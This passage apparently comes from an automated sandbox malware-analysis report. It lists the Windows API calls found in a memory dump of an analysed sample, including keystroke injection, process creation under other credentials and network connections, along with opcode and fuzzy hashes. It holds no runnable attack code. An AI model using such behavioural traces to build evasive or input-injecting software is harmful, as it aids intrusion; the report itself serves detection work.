                                                                                                                                                          • Opcode ID: cf691fc004a4741297d6bc3315e88e13c6bda237b7d7f5fcd082d08019794512
                                                                                                                                                          • Instruction ID: da31c628eaf19180d552fe216f991bdb123956a05be4355beffe1bf3b631f800
                                                                                                                                                          • Opcode Fuzzy Hash: cf691fc004a4741297d6bc3315e88e13c6bda237b7d7f5fcd082d08019794512
                                                                                                                                                          • Instruction Fuzzy Hash: A9D0A7749007128FDB205F70F80960237D8AB34301F00541AE456E2AA4D770C4C08650
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E6D9,0000000C,0013E55B,001BDC28,?,?), ref: 0013E6F1
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,IsWow64Process,?,?), ref: 0013E703
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-3024904723
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0017EBAF,?,0017EAAC), ref: 0017EBC7
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0017EBAF,?,0017EAAC), ref: 0017EBD9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                          • API String ID: 1029625771-1816364905
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,0016135F,?,00161440), ref: 00161389
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,RegisterTypeLibForUser,?,00161440), ref: 0016139B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                          • API String ID: 1029625771-1071820185
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00161371,?,00161519), ref: 001613B4
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,UnRegisterTypeLibForUser,?,00161519), ref: 001613C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                          • API String ID: 1029625771-1587604923
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00183AC2,?,001829F5), ref: 00183ADA
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,RegDeleteKeyExW,?,00183AC2,?,001829F5), ref: 00183AEC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                          • API String ID: 1029625771-4033151799
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00176AA6), ref: 0012AB2D
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0012AB49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper_wcscmp
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 820872866-0
                                                                                                                                                          APIs
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00180D85
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00180DC8
                                                                                                                                                            • Part of subcall function 00180458: CharLowerBuffW.USER32(?,?,?,?), ref: 00180478
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00180FB2
                                                                                                                                                          • _memmove.LIBCMT ref: 00180FC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3659485706-0
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0017AF56
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017AF61
                                                                                                                                                            • Part of subcall function 00161050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001610B8
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017AF6C
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B23F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 780911581-0
                                                                                                                                                          APIs
                                                                                                                                                          • _memmove.LIBCMT ref: 0012C419
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00166653,?,?,00000000), ref: 0012C495
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileRead_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1325644223-0
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3877424927-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018C354
                                                                                                                                                          • ScreenToClient.USER32(?,00000002), ref: 0018C384
                                                                                                                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0018C3EA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0015D258
                                                                                                                                                          • __itow.LIBCMT ref: 0015D292
                                                                                                                                                            • Part of subcall function 0015D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0015D549
                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0015D2FB
                                                                                                                                                          • __itow.LIBCMT ref: 0015D350
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3379773720-0
                                                                                                                                                          APIs
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0018B3E1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                          APIs
                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0018D617
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018D68D
                                                                                                                                                          • PtInRect.USER32(?,?,0018EB2C), ref: 0018D69D
                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0018D70E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 001644EE
                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0016450A
                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0016456A
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 001645C8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                          APIs
                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00154DE8
                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00154E16
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154E44
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154E7A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00187AB6
                                                                                                                                                            • Part of subcall function 001669C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 001669E3
                                                                                                                                                            • Part of subcall function 001669C9: GetCurrentThreadId.KERNEL32 ref: 001669EA
                                                                                                                                                            • Part of subcall function 001669C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001669F1
                                                                                                                                                          • GetCaretPos.USER32(?), ref: 00187AC7
                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00187B00
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00187B06
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                          • Opcode ID: bf44e4d248e0b84724842ff7a64f63d3d55a0a7a3b9e3164ea60f4355d86e527
                                                                                                                                                          • Instruction ID: f958b29b5b9c660e871975454eee5dd91e69b2680c9529694daa73dff752243c
                                                                                                                                                          • Opcode Fuzzy Hash: bf44e4d248e0b84724842ff7a64f63d3d55a0a7a3b9e3164ea60f4355d86e527
                                                                                                                                                          • Instruction Fuzzy Hash: 4C31ED72D00108AFCB00EFB9DC859EFBBF9EF69314B10806AE815E7211D7359E058BA0
                                                                                                                                                          APIs
                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001749B7
                                                                                                                                                            • Part of subcall function 00174A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174A60
                                                                                                                                                            • Part of subcall function 00174A41: InternetCloseHandle.WININET(00000000), ref: 00174AFD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1463438336-0
                                                                                                                                                          • Opcode ID: 2e71f340d7f588b09ef9054e950590566a92f26dc8ba26ad0acf2d31e762b768
                                                                                                                                                          • Instruction ID: 7525ea0c69d732f165e4b9b9d38b79e0635d247187191bf3bc06a1f05a252844
                                                                                                                                                          • Opcode Fuzzy Hash: 2e71f340d7f588b09ef9054e950590566a92f26dc8ba26ad0acf2d31e762b768
                                                                                                                                                          • Instruction Fuzzy Hash: FD21F631244A05BFDB169F60DC01FBBB7BAFF99704F10801AFA0A97950EB71D850A794
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0015BCD9
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0015BCE0
                                                                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 0015BCFA
                                                                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015BD29
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2621361867-0
                                                                                                                                                          • Opcode ID: 0801b7fdb6247d77093f3625f6686d8d067a113c52af35e25eb9874766479a0d
                                                                                                                                                          • Instruction ID: 09630283f7795a3b9ed711460de236824f4dc58596c00056bc0dca5b047508d7
                                                                                                                                                          • Opcode Fuzzy Hash: 0801b7fdb6247d77093f3625f6686d8d067a113c52af35e25eb9874766479a0d
                                                                                                                                                          • Instruction Fuzzy Hash: 3E216D7210520DEBDF019FA8ED89BEE7BA9EF05309F044015FE11AA560C7B6CDA5DB60
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001888A3
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001888BD
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001888CB
                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001888D9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                          • Opcode ID: d3790afe60df3fc56df8949f9c6888c195862f09489c7e438b6356905fe801c5
                                                                                                                                                          • Instruction ID: 2e81dff3fb8d57ae67d6d5b0ea502e994d1856c411700b0a5fa17cbb8c8edb93
                                                                                                                                                          • Opcode Fuzzy Hash: d3790afe60df3fc56df8949f9c6888c195862f09489c7e438b6356905fe801c5
                                                                                                                                                          • Instruction Fuzzy Hash: 5711B231305524BFDB14AB28EC15FBA7BAAEF9A320F544119F916C76E1CB70AD50CB90
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0017906D
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0017907F
                                                                                                                                                          • accept.WS2_32(00000000,00000000,00000000), ref: 0017908C
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001790A3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 385091864-0
                                                                                                                                                          • Opcode ID: 47d00baa6b19b2318ad29d730b7d4995e7a25b3bd0003db94115a9f08be4485e
                                                                                                                                                          • Instruction ID: 02e9efed9e3aa535ae065519caa969307fadd91f75458c39ab013b75d082eeae
                                                                                                                                                          • Opcode Fuzzy Hash: 47d00baa6b19b2318ad29d730b7d4995e7a25b3bd0003db94115a9f08be4485e
                                                                                                                                                          • Instruction Fuzzy Hash: 6D214272A001249FC7149F69D885ADABBFCEF5A714F00816AF84AD7290DB74DA858B90
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00162CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?), ref: 00162CB9
                                                                                                                                                            • Part of subcall function 00162CAA: lstrcpyW.KERNEL32(00000000,?,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00162CDF
                                                                                                                                                            • Part of subcall function 00162CAA: lstrcmpiW.KERNEL32(00000000,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?), ref: 00162D10
                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00161916
                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 0016193C
                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00161970
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                          • String ID: cdecl
                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                          APIs
                                                                                                                                                          • _free.LIBCMT ref: 00153D65
                                                                                                                                                            • Part of subcall function 001445EC: __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 001445EC: __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 001445EC: RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001613EE
                                                                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00161409
                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0016141F
                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00161474
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3137044355-0
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0015C285
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C297
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C2AD
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C2C8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00167C6C
                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00167C9F
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00167CB5
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00167CBC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                          APIs
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 001649EE
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00164A13
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00164A1D
                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00164A50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                          • Opcode ID: 3e36b3248719019ce48bfd633a19497c9558849e6e3185c42e928d5b8be4cc3a
                                                                                                                                                          • Instruction ID: 8fbe0516de48f6a20471c9031b6a1f88411d3ccf71bf4c7f1cda4100d21615ee
                                                                                                                                                          • Opcode Fuzzy Hash: 3e36b3248719019ce48bfd633a19497c9558849e6e3185c42e928d5b8be4cc3a
                                                                                                                                                          • Instruction Fuzzy Hash: B9112A31D41518EBCF04AFE5ED49AEEBB74FF09751F014055E942B3250CB3095A0CB99
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
